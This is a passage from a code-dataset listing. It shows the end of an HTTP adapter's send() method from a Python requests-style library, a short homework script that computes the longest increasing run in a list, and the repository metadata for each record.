# to decode them.
username = unquote(username)
password = unquote(password)
headers['Proxy-Authorization'] = _basic_auth_str(username,
password)
return headers
def send(self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None):
"""Sends PreparedRequest object. Returns Response object.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
:param stream: (optional) Whether to stream the request content.
:param timeout: (optional) The timeout on the request.
:param verify: (optional) Whether to verify SSL certificates.
:param vert: (optional) Any user-provided SSL certificate to be trusted.
:param proxies: (optional) The proxies dictionary to apply to the request.
"""
conn = self.get_connection(request.url, proxies)
self.cert_verify(conn, request.url, verify, cert)
url = self.request_url(request, proxies)
self.add_headers(request)
chunked = not (request.body is None or 'Content-Length' in request.headers)
if stream:
timeout = TimeoutSauce(connect=timeout)
else:
timeout = TimeoutSauce(connect=timeout, read=timeout)
try:
if not chunked:
resp = conn.urlopen(
method=request.method,
url=url,
body=request.body,
headers=request.headers,
redirect=False,
assert_same_host=False,
preload_content=False,
decode_content=False,
retries=self.max_retries,
timeout=timeout
)
# Send the request.
else:
if hasattr(conn, 'proxy_pool'):
conn = conn.proxy_pool
low_conn = conn._get_conn(timeout=timeout)
low_conn.putrequest(request.method, url, skip_accept_encoding=True)
for header, value in request.headers.items():
low_conn.putheader(header, value)
low_conn.endheaders()
for i in request.body:
low_conn.send(hex(len(i))[2:].encode('utf-8'))
low_conn.send(b'\r\n')
low_conn.send(i)
low_conn.send(b'\r\n')
low_conn.send(b'0\r\n\r\n')
r = low_conn.getresponse()
resp = HTTPResponse.from_httplib(r,
pool=conn,
connection=low_conn,
preload_content=False,
decode_content=False
)
except socket.error as sockerr:
raise ConnectionError(sockerr)
except MaxRetryError as e:
raise ConnectionError(e)
except _ProxyError as e:
raise ProxyError(e)
except (_SSLError, _HTTPError) as e:
if isinstance(e, _SSLError):
raise SSLError(e)
elif isinstance(e, TimeoutError):
raise Timeout(e)
else:
raise
r = self.build_response(request, resp)
if not stream:
r.content
return r
|
[
"ginsdaman@gmail.com"
] |
ginsdaman@gmail.com
|
ee4b23bbf32042a37a0d791f5b2ca1db58e8570e
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2741/60666/264322.py
|
a8362f4be09e9d763b52af7aceca5c10738a7630
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 257
|
py
|
nums=eval(input())
if len(nums)<2:
print(nums)
else:
count=1
temp=1
for i in range(len(nums)-1):
if nums[i]<nums[i+1]:
count+=1
else:
temp=max(count,temp)
count=1
print(max(count,temp))
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.